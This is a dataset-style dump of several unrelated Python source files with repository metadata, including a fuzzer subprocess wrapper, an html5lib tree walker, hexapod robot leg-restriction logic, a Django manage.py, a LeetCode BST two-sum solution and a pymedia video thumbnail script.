blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 777 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 149 values | src_encoding stringclasses 26 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 3 10.2M | extension stringclasses 188 values | content stringlengths 3 10.2M | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
70b4ecc28943ca349c7ef7077d2dc62e6d3ba2c1 | c1646925d393914477aa22e279d20ab8103a5e9f | /fuzzinator/fuzzer/subprocess_runner.py | 8191d1f4b4284dec8ec3e020b49aa25180a40327 | [
"BSD-3-Clause"
] | permissive | harmmachine/fuzzinator | 574d0a6d424a2beb6a305ecb5b8621d4b7a22a2b | 6d0eea40457b93b0fef295e1e14524ad68ee748f | refs/heads/master | 2021-06-08T21:10:51.248453 | 2016-11-14T10:29:22 | 2016-11-14T10:29:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,221 | py | # Copyright (c) 2016 Renata Hodovan, Akos Kiss.
#
# Licensed under the BSD 3-Clause License
# <LICENSE.rst or https://opensource.org/licenses/BSD-3-Clause>.
# This file may not be copied, modified, or distributed except
# according to those terms.
import json
import shutil
import subprocess
import os
class SubprocessRunner(object):
"""
Wrapper around a fuzzer that is available as an executable and can generate
its test cases as file(s) in a directory. First, the external executable is
invoked as a subprocess, and once it has finished, the contents of the
generated files are returned one by one.
**Mandatory parameters of the fuzzer:**
- ``command``: string to pass to the child shell as a command to run (all
occurrences of ``{uid}`` in the string are replaced by an identifier
unique to this fuzz job).
- ``outdir``: path to the directory containing the files generated by the
external fuzzer (all occurrences of ``{uid}`` in the path are replaced
by the same identifier as described at the ``command`` parameter).
**Optional parameters of the fuzzer:**
- ``cwd``: if not ``None``, change working directory before the command
invocation.
- ``env``: if not ``None``, a dictionary of variable names-values to
update the environment with.
**Example configuration snippet:**
.. code-block:: ini
[sut.foo]
# see fuzzinator.call.*
[fuzz.foo-with-bar]
sut=sut.foo
fuzzer=fuzzinator.fuzzer.SubprocessRunner
batch=50
[fuzz.foo-with-bar.fuzzer.init]
outdir=${fuzzinator:work_dir}/bar/{uid}
command=barfuzzer -n ${fuzz.foo-with-bar:batch} -o ${outdir}
"""
def __init__(self, outdir, command, cwd=None, env=None, **kwargs):
# uid is used to make sure we create unique directory for the generated test cases.
self.uid = '{pid}-{id}'.format(pid=os.getpid(), id=id(self))
self.outdir = outdir.format(uid=self.uid)
self.command = command
self.cwd = cwd or os.getcwd()
self.env = dict(os.environ, **json.loads(env)) if env else None
self.tests = []
def __enter__(self):
os.makedirs(self.outdir, exist_ok=True)
with open(os.devnull, 'w') as FNULL:
with subprocess.Popen(self.command.format(uid=self.uid),
cwd=self.cwd,
env=self.env,
shell=True,
stdout=FNULL,
stderr=FNULL) as proc:
proc.wait()
self.tests = [os.path.join(self.outdir, test) for test in os.listdir(self.outdir)]
return self
def __exit__(self, *exc):
shutil.rmtree(self.outdir, ignore_errors=True)
return None
# Although kwargs is not used here but the 'index' argument will be passed anyhow
# and it has to be accepted.
def __call__(self, **kwargs):
if not self.tests:
return None
test = self.tests.pop()
with open(test, 'rb') as f:
return f.read()
| [
"reni@inf.u-szeged.hu"
] | reni@inf.u-szeged.hu |
e1ff943f227873288abcaa9d018334cfc0af1406 | a2211f0ef8297a77200a0b2eec8ba3476989b7e6 | /itcast/06_Django/day01_Django入门/demo03_Module.py | e363d13f3109bb7c2ac9c46470415e9f547d03a0 | [] | no_license | qq1197977022/learnPython | f720ecffd2a70044f1644f3527f4c29692eb2233 | ba294b8fa930f784304771be451d7b5981b794f3 | refs/heads/master | 2020-03-25T09:23:12.407510 | 2018-09-16T00:41:56 | 2018-09-16T00:42:00 | 143,663,862 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 626 | py | # 图书表结构
# 表名: Book
# 图书名: name
# 图书发布日期: date
# 英雄表结构
# 表名: Hero
# 英雄姓名: name
# 英雄性别: gender
# 英雄简介: introduce
# 所属图书: book
# E-R模型
# E:
# 1.图书
# 2.英雄
# R n:1 ~ 多对一
# Models映射关系
# 1.类对象: 表
# 2.类对象数据属性: 表字段
# 1.因此仅CURD类对象数据属性时才需要migrate, CURD方法无需migrate ~ 不对应数据库数据
# 2.id字段会默认自动添加
# 3.实例对象: 数据记录
#
| [
"1197977022@qq.com"
] | 1197977022@qq.com |
00e5ac08fe0d6db9b3ad6031826c2e0b81bcce83 | 4d05be863b63a56a90b4c46b15069827b33ecaae | /django/venv/Lib/site-packages/pip/_vendor/html5lib/treewalkers/_base.py | 1b1b58b4d9126ec55aa0147c945fac92d6ec1b01 | [] | no_license | leeo1116/PyCharm | e532fa9754056019508cc454214ee1a8ad9b26a9 | b6942c05c27556e5fe47879e8b823845c84c5430 | refs/heads/master | 2022-11-06T00:43:14.882453 | 2017-07-13T04:50:00 | 2017-07-13T04:50:00 | 36,851,636 | 0 | 1 | null | 2022-10-20T10:44:39 | 2015-06-04T06:09:09 | Python | UTF-8 | Python | false | false | 7,062 | py | from __future__ import absolute_import, division, unicode_literals
from pip._vendor.six import text_type, string_types
__all__ = ["DOCUMENT", "DOCTYPE", "TEXT", "ELEMENT", "COMMENT", "ENTITY", "UNKNOWN",
"TreeWalker", "NonRecursiveTreeWalker"]
from xml.dom import Node
DOCUMENT = Node.DOCUMENT_NODE
DOCTYPE = Node.DOCUMENT_TYPE_NODE
TEXT = Node.TEXT_NODE
ELEMENT = Node.ELEMENT_NODE
COMMENT = Node.COMMENT_NODE
ENTITY = Node.ENTITY_NODE
UNKNOWN = "<#UNKNOWN#>"
from ..constants import voidElements, spaceCharacters
spaceCharacters = "".join(spaceCharacters)
def to_text(s, blank_if_none=True):
"""Wrapper around six.text_type to convert None to empty string"""
if s is None:
if blank_if_none:
return ""
else:
return None
elif isinstance(s, text_type):
return s
else:
return text_type(s)
def is_text_or_none(string):
"""Wrapper around isinstance(string_types) or is None"""
return string is None or isinstance(string, string_types)
class TreeWalker(object):
def __init__(self, tree):
self.tree = tree
def __iter__(self):
raise NotImplementedError
def error(self, msg):
return {"type": "SerializeError", "simba_data": msg}
def emptyTag(self, namespace, name, attrs, hasChildren=False):
assert namespace is None or isinstance(namespace, string_types), type(namespace)
assert isinstance(name, string_types), type(name)
assert all((namespace is None or isinstance(namespace, string_types)) and
isinstance(name, string_types) and
isinstance(value, string_types)
for (namespace, name), value in attrs.items())
yield {"type": "EmptyTag", "name": to_text(name, False),
"namespace": to_text(namespace),
"simba_data": attrs}
if hasChildren:
yield self.error("Void element has children")
def startTag(self, namespace, name, attrs):
assert namespace is None or isinstance(namespace, string_types), type(namespace)
assert isinstance(name, string_types), type(name)
assert all((namespace is None or isinstance(namespace, string_types)) and
isinstance(name, string_types) and
isinstance(value, string_types)
for (namespace, name), value in attrs.items())
return {"type": "StartTag",
"name": text_type(name),
"namespace": to_text(namespace),
"simba_data": dict(((to_text(namespace, False), to_text(name)),
to_text(value, False))
for (namespace, name), value in attrs.items())}
def endTag(self, namespace, name):
assert namespace is None or isinstance(namespace, string_types), type(namespace)
assert isinstance(name, string_types), type(namespace)
return {"type": "EndTag",
"name": to_text(name, False),
"namespace": to_text(namespace),
"simba_data": {}}
def text(self, data):
assert isinstance(data, string_types), type(data)
data = to_text(data)
middle = data.lstrip(spaceCharacters)
left = data[:len(data) - len(middle)]
if left:
yield {"type": "SpaceCharacters", "simba_data": left}
data = middle
middle = data.rstrip(spaceCharacters)
right = data[len(middle):]
if middle:
yield {"type": "Characters", "simba_data": middle}
if right:
yield {"type": "SpaceCharacters", "simba_data": right}
def comment(self, data):
assert isinstance(data, string_types), type(data)
return {"type": "Comment", "simba_data": text_type(data)}
def doctype(self, name, publicId=None, systemId=None, correct=True):
assert is_text_or_none(name), type(name)
assert is_text_or_none(publicId), type(publicId)
assert is_text_or_none(systemId), type(systemId)
return {"type": "Doctype",
"name": to_text(name),
"publicId": to_text(publicId),
"systemId": to_text(systemId),
"correct": to_text(correct)}
def entity(self, name):
assert isinstance(name, string_types), type(name)
return {"type": "Entity", "name": text_type(name)}
def unknown(self, nodeType):
return self.error("Unknown node type: " + nodeType)
class NonRecursiveTreeWalker(TreeWalker):
def getNodeDetails(self, node):
raise NotImplementedError
def getFirstChild(self, node):
raise NotImplementedError
def getNextSibling(self, node):
raise NotImplementedError
def getParentNode(self, node):
raise NotImplementedError
def __iter__(self):
currentNode = self.tree
while currentNode is not None:
details = self.getNodeDetails(currentNode)
type, details = details[0], details[1:]
hasChildren = False
if type == DOCTYPE:
yield self.doctype(*details)
elif type == TEXT:
for token in self.text(*details):
yield token
elif type == ELEMENT:
namespace, name, attributes, hasChildren = details
if name in voidElements:
for token in self.emptyTag(namespace, name, attributes,
hasChildren):
yield token
hasChildren = False
else:
yield self.startTag(namespace, name, attributes)
elif type == COMMENT:
yield self.comment(details[0])
elif type == ENTITY:
yield self.entity(details[0])
elif type == DOCUMENT:
hasChildren = True
else:
yield self.unknown(details[0])
if hasChildren:
firstChild = self.getFirstChild(currentNode)
else:
firstChild = None
if firstChild is not None:
currentNode = firstChild
else:
while currentNode is not None:
details = self.getNodeDetails(currentNode)
type, details = details[0], details[1:]
if type == ELEMENT:
namespace, name, attributes, hasChildren = details
if name not in voidElements:
yield self.endTag(namespace, name)
if self.tree is currentNode:
currentNode = None
break
nextSibling = self.getNextSibling(currentNode)
if nextSibling is not None:
currentNode = nextSibling
break
else:
currentNode = self.getParentNode(currentNode)
| [
"leeo1116@gmail.com"
] | leeo1116@gmail.com |
b1a1dfdb2ba394b8989fec6894adf5c9aa4ab69b | b7e14f2c87407abc986ab4c5002c8add9f023631 | /stompy/restriction/leg.py | b7e61af7ea5314d0009197daaec9e82aae16bc30 | [] | no_license | joelgreenwood/stompy | cc220f78f3c9ad7f4714cdae50f972a8d2dad60c | 395eafd8e350f099e5b14e8c5b013d9e122a4d47 | refs/heads/master | 2020-04-24T20:30:27.263064 | 2019-02-23T18:15:58 | 2019-02-23T18:15:58 | 172,246,468 | 0 | 0 | null | 2019-02-23T18:04:13 | 2019-02-23T18:04:12 | null | UTF-8 | Python | false | false | 12,914 | py | #!/usr/bin/env python
"""
Supply this a stance plan in body coordinates
it will produce plans in body coordinates
restriction will be updated with foot coordinates
it will produce 'requests' for plans that will be 'accepted'
"""
import time
import numpy
from .. import consts
from .. import geometry
from .. import kinematics
from .. import log
from .. import signaler
from .. import transforms
def swing_position_from_intersections(tc, rspeed, c0, ipts, step_ratio):
# if len(ipts) == 0, return to center?
if len(ipts) == 0:
return c0
# if rspeed > 0: rotating clockwise, find point counterclockwise to 0
# if rspeed < 0: rotating counterclockwise, find point clockwise to 0
tc = numpy.array(tc)
cv = numpy.array(c0) - tc
cvn = cv / numpy.linalg.norm(cv)
ma = None
#mi = None
mas = None
for i in ipts:
iv = numpy.array(i) - tc
ivn = iv / numpy.linalg.norm(iv)
#a = numpy.arctan2(
# numpy.linalg.norm(numpy.cross(iv, cv)), numpy.dot(iv, cv))
angle_sign = numpy.sign(numpy.cross(ivn, cvn))
if numpy.sign(rspeed) != angle_sign:
continue
a = numpy.arccos(numpy.clip(numpy.dot(ivn, cvn), -1.0, 1.0))
if ma is None or a < ma:
ma = a
#mi = i
mas = angle_sign
#a = numpy.arccos(
# numpy.dot(iv, cv) /
# (numpy.linalg.norm(iv) * numpy.linalg.norm(cv)))
#print(i, a)
if ma is None:
return c0
#return mi
pa = -mas * ma * step_ratio
# rotate vector from tc to c0 (cv) by angle pa
ca = numpy.cos(pa)
sa = numpy.sin(pa)
x, y = cv
return (
x * ca - y * sa + tc[0],
x * sa + y * ca + tc[1])
def calculate_swing_target(
tx, ty, z, leg_number, rspeed, step_ratio,
min_hip_distance=None, target_calf_angle=0):
# get x with vertical calf
# vertical calf doesn't work with z > -19 or z < -75,
# I don't think we can walk with
# legs this high/low anyway
# TODO cache these, they're used >1 time
l, r = kinematics.leg.limits_at_z_2d(z)
#c0x = kinematics.leg.x_with_vertical_calf(z)
c0x = kinematics.leg.x_with_calf_angle(z, target_calf_angle)
if c0x <= l or c0x >= r:
c0x, _ = kinematics.leg.xy_center_at_z(z)
# calculate target movement circle using center of tx, ty
#tc = target_circle(tx, ty, c0x, 0.)
tc = {
'center': (tx, ty),
'radius': numpy.sqrt((tx - c0x) ** 2. + (ty - 0.) ** 2.),
}
ipts = kinematics.leg.limit_intersections(
tc, z, leg_number, min_hip_distance=min_hip_distance)
sp = swing_position_from_intersections(
[tx, ty], rspeed, [c0x, 0], ipts, step_ratio)
return sp
def calculate_translation_swing_target(
dx, dy, z, leg_number, rspeed, step_ratio,
min_hip_distance=None, target_calf_angle=0):
l, r = kinematics.leg.limits_at_z_2d(z)
c0x = kinematics.leg.x_with_calf_angle(z, target_calf_angle)
if c0x <= l or c0x >= r:
c0x, _ = kinematics.leg.xy_center_at_z(z)
# TODO calculate optimal step
m = max(abs(dx), abs(dy))
if m < 0.00001:
ndx, ndy = 0, 0
else:
ndx, ndy = dx / m, dy / m
sp = c0x + dx * step_ratio * 12., 0 + dy * step_ratio * 12.
return sp
def calculate_restriction(
xyz, angles, limits, limit_eps, calf_eps, max_calf_angle):
# use angle limits to compute restriction
r = 0
for j in ('hip', 'thigh', 'knee'):
jmin, jmax = limits[j]
jmid = (jmax + jmin) / 2.
jabsmax = float(max(
abs(jmid - jmax), abs(jmin - jmid)))
if angles[j] > jmid:
jl = angles[j] - jmax
else:
jl = jmin - angles[j]
# TODO should these be normalized to be 0 - 1
# take 'max' across joint angles, only the worst sets restriction
r = max(min(1.0, numpy.exp(limit_eps * (jl / jabsmax))), r)
#if self.leg.leg_number == 1:
# print(j, jl, r)
# calf angle, if eps == 0, skip
if calf_eps > 0.001:
ca = abs(kinematics.leg.angles_to_calf_angle(
angles['hip'], angles['thigh'], angles['knee']))
r = max(min(1.0, numpy.exp(
calf_eps * ((ca - max_calf_angle) / max_calf_angle))), r)
return r
class Foot(signaler.Signaler):
def __init__(
self, leg, cfg):
super(Foot, self).__init__()
self.leg = leg
self.cfg = cfg
self.limits = geometry.get_limits(self.leg.leg_number)
self.logger = log.make_logger(
'Res-%s' %
consts.LEG_NAME_BY_NUMBER[self.leg.leg_number])
self.leg.on('xyz', self.on_xyz)
self.leg.on('angles', self.on_angles)
self.last_lift_time = time.time()
self.leg_target = None
self.body_target = None
self.swing_target = None
self.swing_info = None
self.unloaded_height = None
# stance -> lift -> swing -> lower -> wait
self.state = None
self.restriction = None
self.xyz = None
self.angles = None
self.restriction_modifier = 0.
def send_plan(self):
#print("res.send_plan: [%s]%s" % (self.leg.leg_number, self.state))
if self.state is None or self.leg_target is None:
# TODO always stop on disable?
self.leg.send_plan(mode=consts.PLAN_STOP_MODE)
elif self.state in ('stance', 'wait'):
self.leg.send_plan(
mode=consts.PLAN_MATRIX_MODE,
frame=consts.PLAN_LEG_FRAME,
matrix=self.leg_target,
speed=0)
elif self.state == 'lift':
v = self.cfg.get_speed('lift')
T = (
self.leg_target *
transforms.translation_3d(0, 0, v * consts.PLAN_TICK))
#print(self.leg_target, T)
self.leg.send_plan(
mode=consts.PLAN_MATRIX_MODE,
frame=consts.PLAN_LEG_FRAME,
matrix=T,
speed=0)
elif self.state == 'swing':
z = self.unloaded_height + self.cfg.lift_height
if self.swing_info is None: # assume target of 0, 0
sp = calculate_translation_swing_target(
0, 0, self.cfg.lower_height,
self.leg.leg_number, None, 0.,
min_hip_distance=self.cfg.min_hip_distance,
target_calf_angle=self.cfg.target_calf_angle)
elif len(self.swing_info) == 3: # rotation
rx, ry, rspeed = self.swing_info
sp = calculate_swing_target(
rx, ry, self.cfg.lower_height,
self.leg.leg_number, rspeed, self.cfg.step_ratio,
min_hip_distance=self.cfg.min_hip_distance,
target_calf_angle=self.cfg.target_calf_angle)
else: # translation
lx, ly = self.swing_info
sp = calculate_translation_swing_target(
lx, ly, self.cfg.lower_height,
self.leg.leg_number, None, self.cfg.step_ratio,
min_hip_distance=self.cfg.min_hip_distance,
target_calf_angle=self.cfg.target_calf_angle)
self.swing_target = sp[0], sp[1]
# print(self.swing_target, z)
# TODO check if point is valid
# TODO error out on invalid
self.leg.send_plan(
mode=consts.PLAN_TARGET_MODE,
frame=consts.PLAN_LEG_FRAME,
linear=(
sp[0],
sp[1],
z),
speed=self.cfg.get_speed('swing'))
elif self.state == 'lower':
v = -self.cfg.get_speed('lower')
T = (
self.leg_target *
transforms.translation_3d(0, 0, v * consts.PLAN_TICK))
self.leg.send_plan(
mode=consts.PLAN_MATRIX_MODE,
frame=consts.PLAN_LEG_FRAME,
matrix=T,
speed=0)
def set_target(self, target, update_swing=True):
self.logger.debug({'set_target': (target, update_swing)})
bx, by = target.rotation_center
rx, ry, rz = kinematics.body.body_to_leg(
self.leg.leg_number, bx, by, 0)
lT = transforms.rotation_about_point_3d(
rx, ry, rz, 0, 0, target.speed)
# TODO add z change
if update_swing:
self.swing_info = (rx, ry, target.speed)
self.swing_target = None
self.leg_target = lT
self.send_plan()
def set_state(self, state):
if state != self.state and self.restriction is not None:
# reset restriction smoothing
#print("resetting dr")
self.restriction['dr'] = 0.
self.state = state
self.logger.debug({'state': state})
if self.state == 'lift':
self.unloaded_height = None
self.last_lift_time = time.time()
elif self.state == 'swing':
pass
self.send_plan()
self.trigger('state', state)
def calculate_restriction(self, xyz, angles):
"""Calculate leg restriction
Result is stored in self.restriction and signaled as 'restriction'
Result contains:
- time: time of xyz event
- r: current calculated restriction
- idr: slope of restriction change from last to new value
- dr: smoothed idr
"""
r = calculate_restriction(
xyz, angles, self.limits, self.cfg.eps,
self.cfg.calf_eps, self.cfg.max_calf_angle)
# TODO use calf angle
# add in the 'manual' restriction modifier (set from ui/controller)
r += self.restriction_modifier
if self.restriction is not None:
pt = self.restriction['time']
dt = (xyz['time'] - pt)
idr = (r - self.restriction['r']) / dt
dr = (
self.restriction['dr'] * self.cfg.dr_smooth +
idr * (1. - self.cfg.dr_smooth))
else: # if no previous value, can't calculate dr
idr = 0.
dr = 0.
self.restriction = {
'time': xyz['time'], 'r': r, 'dr': dr, 'idr': idr}
self.logger.debug({'restriction': self.restriction})
self.trigger('restriction', self.restriction)
def _is_swing_done(self, xyz):
tx, ty = self.swing_target
d = ((tx - xyz['x']) ** 2. + (ty - xyz['y']) ** 2.) ** 0.5
# TODO also check for increase in distance
return d < self.cfg.swing_slop
def on_xyz(self, xyz):
self.xyz = xyz
if self.angles is not None:
self.update()
def on_angles(self, angles):
self.angles = angles
if self.xyz is not None:
self.update()
def update(self):
# TODO if angles['valid'] is False?
self.calculate_restriction(self.xyz, self.angles)
new_state = None
if self.state is None: # restriction control is disabled
self.xyz = None
self.angles = None
return
elif self.state == 'swing':
if self._is_swing_done(self.xyz):
new_state = 'lower'
elif self.state == 'lower':
# TODO check for loaded >L lbs
#if self.xyz['z'] < self.lower_height:
if (
(
(self.xyz['z'] - self.cfg.lower_height) <
self.cfg.height_slop) and
self.angles['calf'] > self.cfg.loaded_weight):
new_state = 'wait'
elif self.state == 'wait':
if self.restriction['dr'] > 0.:
# print(
# "exiting wait[%s]: %s" %
# (self.leg.leg_number, self.restriction))
new_state = 'stance'
#elif self.state == 'stance'
elif self.state == 'lift':
# check for unloaded and >Z inches off ground
if (
self.unloaded_height is None and
self.angles['calf'] < self.cfg.unloaded_weight):
self.unloaded_height = self.xyz['z']
if (
self.unloaded_height is not None and
self.xyz['z'] > (
self.unloaded_height + self.cfg.lift_height)):
new_state = 'swing'
#if self.xyz['z'] > self.lift_height:
# new_state = 'swing'
# clear xyz and angles cache
self.xyz = None
self.angles = None
if new_state is not None:
#print(
# "setting new state[%s]: %s, %s" % (
# self.leg.leg_number, new_state, self.restriction))
self.set_state(new_state)
| [
"brettgraham@gmail.com"
] | brettgraham@gmail.com |
f31f84c2ec744d3c6647888392a55969ccdec528 | 891f2da7934e4751e165c9537cf993730f04c19b | /manage.py | eb9f68f4821c35e7d9c0ac1226e721d2f64ae162 | [] | no_license | Aryan0807/alumni_portal | e75d1d8005252b240bd5e286371927be02e84a72 | 0a73d5faab4bd77fbebc0588e3fb89978d780a61 | refs/heads/master | 2023-06-22T13:15:38.357455 | 2021-07-20T05:17:39 | 2021-07-20T05:17:39 | 386,740,158 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 632 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'alumniportal.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"you@example.com"
] | you@example.com |
47736549784a127f5f6fbf30a3c83f167d46bee4 | 462670fdda0c89ab500a131abd84628ce7281847 | /utils_xyz/sample_group_blockid.py | f46c8876c35b1fadc790972f110753c039c2101a | [
"MIT"
] | permissive | xuyongzhi/dynamic_pointnet | 528d7cc7384c096a6e81ab41c7291e6897e4cfdb | f4a5a6203840babd40783716b127219e4655cbaf | refs/heads/master | 2021-03-27T20:38:54.622833 | 2018-03-26T06:07:27 | 2018-03-26T06:07:27 | 111,261,303 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 470 | py | # xyz Decc 2017
# Do 3d point cloud sample and group by block index
def get_sample_group_idxs(npoint,block_step,nsample):
return sample_idxs,group_idxs
def sample_and_group(npoint,block_step,nsample):
'''
Get npoint sub-blocks with equal stride and <block_step> step. The center of each sub-block is npoint down-sampled points.
In each sub-block, nsample points are extracted.
'''
return new_xyz, sub_block_idxs, group_idxs, grouped_xyz
| [
"buaaxyz@yeah.net"
] | buaaxyz@yeah.net |
02f1709794680778775a1bff3b92d7b941023984 | 762cbba14c80f4dd09fa6e5915e094825eef1cae | /653. Two Sum IV - Input is a BST.py | db1433542d4832888a00278cd4eb95174686af67 | [] | no_license | arnabs542/Leetcode-18 | 1faff2564b4a5bb970308187a0b71553fd85a250 | 02d31ab3363c92e8fdde15100bf4a3cbcd43ecd0 | refs/heads/master | 2022-07-26T12:18:38.834287 | 2020-05-19T05:40:48 | 2020-05-19T05:40:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 998 | py | # Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def findTarget(self, root, k):
l = []
def helper(node):
if not node:
return
helper(node.left)
l.append(node.val)
helper(node.right)
helper(root)
i, j = 0, len(l) - 1
while i < j:
s = l[i] + l[j]
if s < k:
i += 1
elif s > k:
j -= 1
else:
return True
return False
"""
:type root: TreeNode
:type k: int
:rtype: bool
"""
# Given a Binary Search Tree and a target number, return true if there exist two elements in the BST such that their sum is equal to the given target.
| [
"noreply@github.com"
] | arnabs542.noreply@github.com |
93fc017e4cdf01ac3011b9e5e8575f19b95118f6 | 7677c7be75c651eb60e04c9d718981156f995e93 | /scripts/train.py | 7dfd38c380614d5b93c6872dd1c241b8150134a9 | [] | no_license | fgs22002/real-word-errors | 74e2ce37d15c37966cb94fa33dd29c2d1052554b | e5944c70d5bf41c58ae435cc2893e035ff730323 | refs/heads/main | 2023-04-06T20:54:33.325315 | 2021-04-06T16:54:47 | 2021-04-06T16:54:47 | 355,241,936 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,805 | py | """
real word errors
training
@author Daniel Bravo daniel.bravo@um.es
@author Jesica López <jesica.lopez@um.es>
@author José Antonio García-Díaz joseantonio.garcia8@um.es
@author Fernando Molina-Molina <fernando.molina@vocali.net>
@author Francisco García Sánchez <frgarcia@um.es>
"""
from pickle import dump
from funciones import define_model, load_doc
from tensorflow.keras.models import Sequential
from data_generator import DataGenerator
from tensorflow.keras.preprocessing.text import Tokenizer
from numpy import array
from tensorflow.keras.utils import to_categorical
from pickle import load
import numpy as np
import os.path
# @var doc load sequences
doc = load_doc('./../input/spanishText_10000_15000_STOPWORDS.txt')
lines = doc.split('\n')
print (lines[:200])
lines = lines[0:round((len(lines))*0.01)]
print ('N lines: ')
print (len(lines))
# encode sequences:
tokenizer = Tokenizer ()
tokenizer.fit_on_texts (lines)
sequences = tokenizer.texts_to_sequences (lines)
# vocabulary size
vocab_size = len(tokenizer.word_index) + 1
print ('vocab_size:')
print (vocab_size)
# sequence input and labels: save .npy files
sequences = array (sequences)
X, y = sequences[:,:-1], sequences[:,-1]
seq_length = X.shape[1]
# Generate sequences
for x in range (X.shape[0]):
ID = 'id-' + str(x+1)
fi = './../npy_files/spanishText_10000_15000/' + ID + '.npy'
if not os.path.exists (fi):
np.save (fi, X[x,:])
# dictionaries
samp_ids = ['id-' + str(counter + 1) for counter, item in enumerate (lines)]
# @var train_ids Sample training
train_ids = samp_ids[0:round(len(samp_ids) * 0.8)]
# @var val_ids Sample validation
val_ids = samp_ids[round (len (samp_ids) * 0.8):len (samp_ids)]
# @var partition Dict
partition = {
'train': train_ids,
'validation': val_ids
}
# @var labels Dict
labels = {samp_ids[j]: y[j] for j in range(len(samp_ids))}
# Configure TRAINING parameters
# @var EPOCHS int
EPOCHS = 50
# @var BATCH_SIZE int
BATCH_SIZE = 32
# @var dat_dim int
dat_dim = 50
# @var params Dict
params = {
'dim': dat_dim,
'batch_size': BATCH_SIZE,
'n_classes': vocab_size,
'shuffle': True
}
# @var training_generator DataGenerator
training_generator = DataGenerator (partition['train'], labels, **params)
# @var validation_generator DataGenerator
validation_generator = DataGenerator (partition['validation'], labels, **params)
# @var model
model = define_model (vocab_size, seq_length)
# Fit model and validate
evaluation = model.fit_generator (generator=training_generator, epochs = EPOCHS, validation_data = validation_generator)
print(evaluation)
# Save model to file and save tokenizer
model.save ('./../models/model_test_Wiki_001.h5')
dump(tokenizer, open ('./../tokenizers/model_test_Wiki_001.pkl', 'wb')) | [
"Smolky@gmail.com"
] | Smolky@gmail.com |
a20e2f22d6517c4c5cfd9edc79849337bd656004 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/adjectives/_demented.py | 96964537d8de1cbe3540f4986be959bac0caa3e9 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 472 | py |
#calss header
class _DEMENTED():
def __init__(self,):
self.name = "DEMENTED"
self.definitions = [u'unable to think or act clearly because you are extremely worried, angry, or excited by something: ', u'crazy: ']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'adjectives'
def run(self, obj1, obj2):
self.jsondata[obj2] = {}
self.jsondata[obj2]['properties'] = self.name.lower()
return self.jsondata
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
7f2040a18d8ae48cdf68130156100676b859f15b | 1b3addbc9473b6ffb999665601470ccc4d1153b0 | /libs/thumb/movieThumb.py | 83e16f22327f4b3a9e7bde2ac613809fe449ca31 | [] | no_license | weijia/approot | e1f712fa92c4c3200210eb95d251d890295769ba | 15fac5b31a4d619d1bdede3d1131f5e6e57cd43b | refs/heads/master | 2020-04-15T13:15:01.956721 | 2014-08-26T14:02:17 | 2014-08-26T14:02:17 | 11,049,975 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,248 | py | #! /bin/env python
#from http://pymedia.org/tut/src/dump_video.py.html
import sys, os
import pymedia.muxer as muxer
import pymedia.video.vcodec as vcodec
import pygame
def genVideoThumb(local_path, dest_dir):
basename = os.path.basename(local_path)
thumb_path_without_ext = os.path.join(dest_dir, basename.split(".")[0] + "_T")
import random
while os.path.exists(thumb_path_without_ext + ".jpg"):
thumb_path_without_ext += str(random.randint(0, 10))
thumb_path = thumb_path_without_ext + '___%d.jpg'
dumpVideo(local_path, thumb_path.encode('gbk'), 2)
return thumb_path % 1
def dumpVideo(inFile, outFilePattern, fmt):
dm = muxer.Demuxer(inFile.split('.')[-1])
i = 1
f = open(inFile, 'rb')
s = f.read(400000)
r = dm.parse(s)
v = filter(lambda x: x['type'] == muxer.CODEC_TYPE_VIDEO, dm.streams)
if len(v) == 0:
raise 'There is no video stream in a file %s' % inFile
v_id = v[0]['index']
print 'Assume video stream at %d index: ' % v_id
c = vcodec.Decoder(dm.streams[v_id])
while len(s) > 0:
if i > 1:
break
for fr in r:
if fr[0] == v_id:
d = c.decode(fr[1])
# Save file as RGB BMP
if d:
dd = d.convert(fmt)
img = pygame.image.fromstring(dd.data, dd.size, "RGB")
pygame.image.save(img, outFilePattern % i)
i += 1
break
s = f.read(400000)
r = dm.parse(s)
#print 'Saved %d frames' % i
# ----------------------------------------------------------------------------------
# Dump the whole video file into the regular BMP images in the directory and file name specified
# http://pymedia.org/
